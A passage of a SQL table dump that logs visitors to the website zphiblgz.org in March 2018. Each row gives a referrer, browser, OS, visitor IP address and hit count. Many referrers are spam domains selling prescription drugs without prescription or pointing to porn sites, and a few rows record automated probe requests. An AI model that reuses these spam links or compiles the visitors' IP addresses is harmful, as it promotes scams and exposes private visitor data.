PxcS0FIt2XJtitS4NXQ&l10n=ru&cts=1520475524976&mc=7.33426305908','Chrome','Windows','63.0.3239.132','','95.143.30.94','000',1,0),(26129,'2018-03-07','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',10,0),(26130,'2018-03-07','https://zphiblgz.org','Firefox','Linux','52.0','','144.76.153.198','000',1,0),(26131,'2018-03-07','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.138','000',1,0),(26132,'2018-03-07','http://komukc.com.ua/','MSIE','Windows','7.0','','178.159.37.55','000',3,0),(26133,'2018-03-07','https://owa.howardcc.edu/owa/redir.aspx?REF=XbV2biVOD_6flHMRtgAaL1opmhDrH4AxG8rIpI1SK9tXHnLLnoTVCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Chrome','Android','62.0.3202.84','','69.143.221.179','000',2,0),(26134,'2018-03-07','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(26135,'2018-03-07','https://zphiblgz.org','MSIE','Windows','11.0','','34.215.61.225','000',2,0),(26136,'2018-03-07','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(26137,'2018-03-07','http://skinali.photo-clip.ru/','Opera','Windows','7.54','','178.137.16.174','000',2,0),(26138,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',3,0),(26139,'2018-03-08','https://zphiblgz.org','Safari','iPhone','11.0','','76.111.14.150','000',4,0),(26140,'2018-03-08','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','109.126.236.37','000',2,0),(26141,'2018-03-08','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(26142,'2018-03-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(26143,'2018-03-08','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.185','000',1,0),(26144,'2018-03-08','http://aibolita.com/','MSIE','Windows','6.0','','134.249.48.151','000',1,0),(26145,'2018-03-08','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(26146,'2018-03-08','http://slomm.ru/','MSIE','Windows','6.0','','178.137.18.222','000',2,0),(26147,'2018-03-08','https://beachtoday.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(26148,'2018-03-08','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.31','000',1,0),(26149,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','5.9.17.118','000',1,0),(26150,'2018-03-08','https://outlook.live.com/','Chrome','Chrome OS','59.0.3071.134','','96.234.182.174','000',2,0),(26151,'2018-03-08','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.167.49','000',1,0),(26152,'2018-03-08','http://www.inet-shop.su/','MSIE','Windows','2.0','','134.249.48.151','000',1,0),(26153,'2018-03-08','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(26154,'2018-03-08','https://zphiblgz.org','Firefox','Windows','40.1','','196.64.62.62','000',2,0),(26155,'2018-03-08','https://zphiblgz.org','Safari','Macintosh','11.0.2','','70.158.94.252','000',1,0),(26156,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','50.225.39.92','000',4,0),(26157,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','50.225.39.82','000',12,0),(26158,'2018-03-08','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(26159,'2018-03-08','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(26160,'2018-03-08','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(26161,'2018-03-08','https://www.bing.com/','MSIE','Windows','11.0','','205.254.147.8','000',3,0),(26162,'2018-03-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.77.111.217','000',2,0),(26163,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','52.13.17.225','000',2,0),(26164,'2018-03-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(26165,'2018-03-08','https://zphiblgz.org','Safari','Macintosh','10.1.2','','71.179.81.192','000',8,0),(26166,'2018-03-08','http://no-rx.info/','MSIE','Windows','6.0','','178.137.16.174','000',2,0),(26167,'2018-03-08','http://www.zphibmaryland.org/lambda-gamma-zetas-roller-skating-jam-event/','Chrome','Windows','64.0.3282.186','','69.85.251.194','000',5,0),(26168,'2018-03-08','https://zphiblgz.org','Chrome','Unknown','64.0.3282.167','','138.197.96.199','000',3,0),(26169,'2018-03-08','https://www.google.com/','Safari','iPhone','11.0','','50.225.39.86','000',5,0),(26170,'2018-03-08','https://www.google.com/','Safari','Macintosh','11.0.3','','73.206.124.202','000',2,0),(26171,'2018-03-08','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.215','000',1,0),(26172,'2018-03-08','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.6.225','000',4,0),(26173,'2018-03-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.206','000',1,0),(26174,'2018-03-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26175,'2018-03-08','https://zphiblgz.org','Firefox','Windows','40.1','','187.58.234.135','000',2,0),(26176,'2018-03-08','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.82','000',3,0),(26177,'2018-03-08','https://www.bing.com/','MSIE','Windows','11.0','','167.102.191.10','000',6,0),(26178,'2018-03-08','https://zphiblgz.org','M','Unknown','Unknown','','217.182.203.55','000',2,0),(26179,'2018-03-08','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','204.126.132.241','000',31,0),(26180,'2018-03-08','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','104.144.17.140','000',1,0),(26181,'2018-03-08','https://zphiblgz.org','Opera','Windows','8.50','','104.144.17.140','000',1,0),(26182,'2018-03-08','http://zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(26183,'2018-03-08','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.8','000',1,0),(26184,'2018-03-08','https://zphiblgz.org','Safari','iPhone','11.0','','172.56.3.77','000',2,0),(26185,'2018-03-08','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.178','000',1,0),(26186,'2018-03-08','https://med-dopomoga.com/','MSIE','Windows','5.0','','134.249.48.151','000',3,0),(26187,'2018-03-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(26188,'2018-03-08','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(26189,'2018-03-08','https://www.google.com/','Edge','Windows','15.15063','','167.102.157.170','000',11,0),(26190,'2018-03-08','http://lerporn.info/','MSIE','Windows','5.5','','178.159.37.55','000',3,0),(26191,'2018-03-08','https://www.google.com/','Safari','iPhone','6.0','','76.111.87.1','000',3,0),(26192,'2018-03-08','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',2,0),(26193,'2018-03-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',4,0),(26194,'2018-03-08','http://www.zphibmaryland.org/chapters/','Chrome','Macintosh','64.0.3282.186','','68.33.95.1','000',6,0),(26195,'2018-03-08','https://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','73.129.22.251','000',1,0),(26196,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',1,0),(26197,'2018-03-08','https://zphiblgz.org','M','Unknown','Unknown','','207.182.140.210','000',2,0),(26198,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26199,'2018-03-08','https://zphiblgz.org','Firefox','Macintosh','57.0','','71.127.150.254','000',19,0),(26200,'2018-03-08','https://zphiblgz.org','Edge','Windows','16.16299','','96.244.50.179','000',7,0),(26201,'2018-03-08','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(26202,'2018-03-08','https://zphiblgz.org','Chrome','Linux','36.0.890.0','','107.23.120.201','000',1,0),(26203,'2018-03-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(26204,'2018-03-08','https://zphiblgz.org/scholarship/application/','Firefox','Windows','34.1','','46.161.9.56','000',3,0),(26205,'2018-03-09','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',11,0),(26206,'2018-03-09','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',1,0),(26207,'2018-03-09','https://kozhakoshek.com/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(26208,'2018-03-09','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(26209,'2018-03-09','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1721.4OPgQzo4-FIQsEOGY7CLyNyi6VXEEBlNeplwzFspp7az7SYALSoaH7NNmMc9QF60.12d1ffc17c2aee692dee19834d938afe7e4b19cc&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4N19MUldTcDhsVzlyd0wtUlZHWjNmSVlObjdDU0JrT1Q1UVdidnJWZkRTbGNoMUJKSjQyNmtfeGEyWGh3TzVUekFPUEU3MDZCR2d1eHhHWGkyWlV1cVl6TjlmbXNLVUFNMHdNUXRTSHdpSHJ2bXRwZlJUSWwyTFNaalQ0blRTS2M&b64e=2&sign=e867e3c0312d5fbff9a987482cd9d8a8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4ZSfhLnjq1C4WG9uEAh_hF5phCfZznDmDrpaAnD9dn72i34TcM7dbXOsMLaSKuvooev9qDhMq4A-kRJHXMEBwy3G1Dhet3xWzTk-9xHau3DzewR7Ai-EfdFcE4JNbRNQz&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSElgplXc9yzCH6SmG656hdzItmzTB2_dYGy_AESHzvtvIoWiDjzSNt57Zu6cNVWkZeQ&l10n=ru&cts=1520577647979&mc=6.57179707559','Chrome','Windows','40.0.2214.115','','95.28.53.89','000',2,0),(26210,'2018-03-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(26211,'2018-03-09','https://zphiblgz.org','Firefox','Windows','40.1','','85.135.79.146','000',2,0),(26212,'2018-03-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','188.120.224.125','000',2,0),(26213,'2018-03-09','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','66.240.236.119','000',1,0),(26214,'2018-03-09','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',2,0),(26215,'2018-03-09','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.111.199','000',19,0),(26216,'2018-03-09','https://zphiblgz.org','Firefox','Windows','40.1','','202.90.133.242','000',2,0),(26217,'2018-03-09','http://polyana-skazok.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26218,'2018-03-09','http://komp-pomosch.ru/','MSIE','Windows','6.0','','178.137.16.174','000',6,0),(26219,'2018-03-09','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.29','000',1,0),(26220,'2018-03-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(26221,'2018-03-09','https://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.39.226','000',2,0),(26222,'2018-03-09','https://happysong.ru/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(26223,'2018-03-09','https://zphiblgz.org/service/','Safari','iPhone','7.0','','40.77.179.201','000',1,0),(26224,'2018-03-09','https://www.google.com.ph/','Chrome','Windows','64.0.3282.186','','112.210.6.246','000',4,0),(26225,'2018-03-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(26226,'2018-03-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(26227,'2018-03-09','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(26228,'2018-03-09','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','88.99.27.172','000',1,0),(26229,'2018-03-09','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',2,0),(26230,'2018-03-09','https://zphiblgz.org','Firefox','Windows','40.1','','95.239.87.193','000',2,0),(26231,'2018-03-09','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(26232,'2018-03-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(26233,'2018-03-09','https://zphiblgz.org/','Safari','Macintosh','11.0.2','','149.202.50.209','000',1,0),(26234,'2018-03-09','https://zphiblgz.org','python-requests','Unknown','2.9.1','','41.141.23.24','000',4,0),(26235,'2018-03-09','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.60','000',1,0),(26236,'2018-03-09','https://zphiblgz.org','Chrome','Windows','23.0.1271.64','','178.156.202.254','000',2,0),(26237,'2018-03-09','https://pfrf-kabinet.ru/','Opera','Windows','9.0','','134.249.48.151','000',3,0),(26238,'2018-03-09','http://doxyporno.com/','MSIE','Windows','6.0','','178.137.18.222','000',4,0),(26239,'2018-03-09','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjmjK2r4N_ZAhUDm1kKHX4TA6wQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','50.242.208.25','000',3,0),(26240,'2018-03-09','https://zphiblgz.org','Java','Unknown','1.6.0','','218.76.29.42','000',1,0),(26241,'2018-03-09','https://sovetskie-plakaty.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(26242,'2018-03-09','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','50.19.191.242','000',1,0),(26243,'2018-03-09','http://zphiblgz.org','Go--client','Unknown','2.0','','50.19.191.242','000',1,0),(26244,'2018-03-09','https://zphiblgz.org','Chrome','Windows','32.0.1700.76','','54.227.111.212','000',3,0),(26245,'2018-03-09','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.160.255.20','000',1,0),(26246,'2018-03-09','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.225.39.83','000',2,0),(26247,'2018-03-09','http://zphiblgz.org/scholarship/','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',1,0),(26248,'2018-03-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(26249,'2018-03-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.206','000',1,0),(26250,'2018-03-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26251,'2018-03-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.199.10.8','000',4,0),(26252,'2018-03-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(26253,'2018-03-09','http://zphiblgz.org/','Firefox','Windows','27.0','','195.22.125.122','000',3,0),(26254,'2018-03-09','http://www.google.com/','Chrome','Android','64.0.3282.137','','73.213.26.190','000',9,0),(26255,'2018-03-09','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','100.36.84.244','000',4,0),(26256,'2018-03-09','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.1.198','000',2,0),(26257,'2018-03-09','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','108.40.120.179','000',2,0),(26258,'2018-03-09','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','11.0.1','','98.231.133.102','000',7,0),(26259,'2018-03-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(26260,'2018-03-09','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.108','000',2,0),(26261,'2018-03-09','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(26262,'2018-03-09','https://pills24h.com/buy-zoloft-online-without-prescription/','Opera','Windows','9.0','','46.119.126.51','000',3,0),(26263,'2018-03-09','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.130','000',1,0),(26264,'2018-03-09','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.2','000',2,0),(26265,'2018-03-09','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.15.152.228','000',3,0),(26266,'2018-03-09','http://www.yur-p.ru/','MSIE','Windows','5.0','','46.119.126.51','000',2,0),(26267,'2018-03-09','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(26268,'2018-03-09','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(26269,'2018-03-09','https://www.google.com/','Safari','Macintosh','11.0.3','','73.212.64.200','000',4,0),(26270,'2018-03-09','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(26271,'2018-03-09','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.29','000',1,0),(26272,'2018-03-09','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(26273,'2018-03-10','http://elementspluss.ru/','MSIE','Windows','5.0','','178.137.16.174','000',2,0),(26274,'2018-03-10','http://www.feminist.org.ua/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(26275,'2018-03-10','https://bonkers.name/','MSIE','Windows','5.5','','178.137.16.174','000',2,0),(26276,'2018-03-10','http://deart-13.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(26277,'2018-03-10','https://zphiblgz.org','Safari','Macintosh','6.0.3','','144.76.153.198','000',1,0),(26278,'2018-03-10','https://www.google.com/','Edge','Windows','16.16299','','174.32.160.26','000',2,0),(26279,'2018-03-10','https://www.google.com/','Chrome','Windows','64.0.3282.186','','72.213.3.18','000',1,0),(26280,'2018-03-10','https://zphiblgz.org','Safari','Macintosh','11.0.2','','5.9.94.207','000',1,0),(26281,'2018-03-10','https://zphiblgz.org','Safari','iPhone','9.0','','27.16.215.64','000',1,0),(26282,'2018-03-10','https://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.93','000',1,0),(26283,'2018-03-10','https://pills24h.com/buy-doxycycline-online-without-prescription/','MSIE','Unknown','7.0b','','46.119.126.51','000',1,0),(26284,'2018-03-10','https://www.google.com/','Chrome','Windows','64.0.3282.186','','173.235.9.34','000',2,0),(26285,'2018-03-10','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(26286,'2018-03-10','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.66','000',1,0),(26287,'2018-03-10','http://superoboi.com.ua/','MSIE','Windows','6.0','','178.137.18.222','000',2,0),(26288,'2018-03-10','http://www.google.com/url?sa=t&rct=j&q=zphiblgz.org&source=web&cd=5&ved=0CF0QFjAE&url=http:%2F%2Fzphiblgz.org%2F&cad=rja','Lynx','Unknown','2.8.5rel.1','','78.158.28.10','000',1,0),(26289,'2018-03-10','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','100.36.84.244','000',22,0),(26290,'2018-03-10','https://zphiblgz.org','Firefox','Windows','58.0','','177.204.198.28','000',2,0),(26291,'2018-03-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26292,'2018-03-10','https://zphiblgz.org','Chrome','Android','65.0.3325.109','','99.203.17.7','000',11,0),(26293,'2018-03-10','http://metallo-konstruktsii.ru/','Opera','Windows','9.01','','178.159.37.55','000',3,0),(26294,'2018-03-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','144.76.153.198','000',1,0),(26295,'2018-03-10','http://all-news.kz/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26296,'2018-03-10','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','96.255.95.22','000',14,0),(26297,'2018-03-10','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','96.255.95.22','000',3,0),(26298,'2018-03-10','https://zphiblgz.org','Safari','Macintosh','10.1.2','','96.255.95.22','000',6,0),(26299,'2018-03-10','https://zphiblgz.org','Firefox','Windows','58.0','','144.76.162.206','000',1,0),(26300,'2018-03-10','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(26301,'2018-03-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(26302,'2018-03-10','https://zphiblgz.org','Firefox','Windows','40.1','','45.247.134.94','000',2,0),(26303,'2018-03-10','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','71.179.18.125','000',1,0),(26304,'2018-03-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','100.16.228.135','000',12,0),(26305,'2018-03-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',2,0),(26306,'2018-03-10','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(26307,'2018-03-10','https://owa.howardcc.edu/owa/','Chrome','Macintosh','64.0.3282.140','','204.126.132.241','000',6,0),(26308,'2018-03-10','https://zphiblgz.org/','Chrome','Android','65.0.3325.109','','69.143.112.183','000',2,0),(26309,'2018-03-10','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.35','000',1,0),(26310,'2018-03-10','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',8,0),(26311,'2018-03-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','71.121.232.125','000',19,0),(26312,'2018-03-10','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.35','000',1,0),(26313,'2018-03-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',2,0),(26314,'2018-03-10','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(26315,'2018-03-10','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.35','000',1,0),(26316,'2018-03-10','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.35','000',1,0),(26317,'2018-03-10','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(26318,'2018-03-10','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.0.46','000',7,0),(26319,'2018-03-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','212.47.246.21','000',1,0),(26320,'2018-03-10','https://www.google.com/','Firefox','Windows','58.0','','76.184.249.157','000',2,0),(26321,'2018-03-10','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.167.112','000',2,0),(26322,'2018-03-10','https://zphiblgz.org','Chrome','Windows','64.0.3282.140','','5.9.106.81','000',1,0),(26323,'2018-03-10','https://zphiblgz.org','Firefox','Linux','57.0','','78.46.156.169','000',1,0),(26324,'2018-03-11','http://aktau.xkaz.org/','MSIE','Windows','6.0','','134.249.48.151','000',6,0),(26325,'2018-03-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(26326,'2018-03-11','https://zphiblgz.org','Firefox','Windows','40.1','','186.52.199.96','000',2,0),(26327,'2018-03-11','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(26328,'2018-03-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(26329,'2018-03-11','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(26330,'2018-03-11','https://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',2,0),(26331,'2018-03-11','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(26332,'2018-03-11','https://zphiblgz.org','Chrome','Chrome OS','63.0.3239.116','','96.234.182.174','000',2,0),(26333,'2018-03-11','http://www.feminist.org.ua/','MSIE','Windows','5.0','','37.115.112.228','000',1,0),(26334,'2018-03-11','https://zphiblgz.org','Firefox','Windows','40.1','','41.105.58.111','000',2,0),(26335,'2018-03-11','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.25.243','000',4,0),(26336,'2018-03-11','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',6,0),(26337,'2018-03-11','https://zphiblgz.org','Firefox','Windows','40.1','','196.194.183.21','000',2,0),(26338,'2018-03-11','https://zphiblgz.org/','Safari','Macintosh','11.0.3','','71.179.81.192','000',12,0),(26339,'2018-03-11','http://truebeauty.cc/','MSIE','Windows','6.0','','178.137.18.222','000',4,0),(26340,'2018-03-11','https://zphiblgz.org','MSIE','Windows','9.0','','34.209.182.200','000',5,0),(26341,'2018-03-11','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(26342,'2018-03-11','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','94.23.31.164','000',1,0),(26343,'2018-03-11','https://www.google.com/','Safari','Macintosh','11.0.3','','73.212.64.200','000',2,0),(26344,'2018-03-11','https://zphiblgz.org/','Chrome','Windows','63.0.3239.108','','107.175.224.148','000',1,0),(26345,'2018-03-11','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','100.36.84.244','000',4,0),(26346,'2018-03-11','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26347,'2018-03-11','https://kerch.site/','MSIE','Windows','6.0','','134.249.53.158','000',3,0),(26348,'2018-03-11','http://zphiblgz.org/wp-link.php?up','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(26349,'2018-03-11','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(26350,'2018-03-11','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(26351,'2018-03-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.27','000',1,0),(26352,'2018-03-11','https://zphiblgz.org','Chrome','Unknown','64.0.3282.167','','138.197.71.243','000',3,0),(26353,'2018-03-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26354,'2018-03-11','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','71.121.167.97','000',19,0),(26355,'2018-03-11','https://zphiblgz.org','Edge','Windows','16.16299','','71.121.167.97','000',6,0),(26356,'2018-03-11','https://zphiblgz.org','Opera Next','Windows','51.0.2830.55','','71.121.167.97','000',3,0),(26357,'2018-03-11','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','71.121.167.97','000',8,0),(26358,'2018-03-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(26359,'2018-03-11','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(26360,'2018-03-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(26361,'2018-03-11','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',25,0),(26362,'2018-03-11','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.146','','100.16.228.140','000',10,0),(26363,'2018-03-11','https://zphiblgz.org','Firefox','Linux','39.0','','104.232.42.127','000',2,0),(26364,'2018-03-11','http://search.yahoo.co.jp/r/FOR=Oai0nsFV3igwqtPkZHoC7KrtyrNJIcZVBAf7RWUciTzgigmCsW04V6bgWjvRmCspeA7gQr9mvir3c1yrwW9V16GwcblahTi7Q_rsVdk6P0PapUpelZaCmjL4k_j2iKb2KPgM9FHZolW..1u4zIxH7dEM6IgDa9KdWSW1SyD6CbxvFhQbpvJldGpgp3NNVPpW_FI1CxWJFQxk/_ylt=A2Rih4_UyqVaSwgA7S.DTwx.;_ylu=X3oDMTBtM3MwOXVkBHBvcwM0BHNlYwNzcgRzbGsDdGl0bGU-/SIG=11ihv1irg/EXP=1520915604/**http%3A//zphiblgz.org/exclusive/','Safari','Macintosh','5.1.9','','58.90.40.172','000',1,0),(26365,'2018-03-11','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.112.10','000',3,0),(26366,'2018-03-11','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.186','','68.134.12.220','000',2,0),(26367,'2018-03-11','https://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.167','','173.64.123.159','000',2,0),(26368,'2018-03-11','https://beachtoday.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(26369,'2018-03-11','https://zphiblgz.org/','Opera 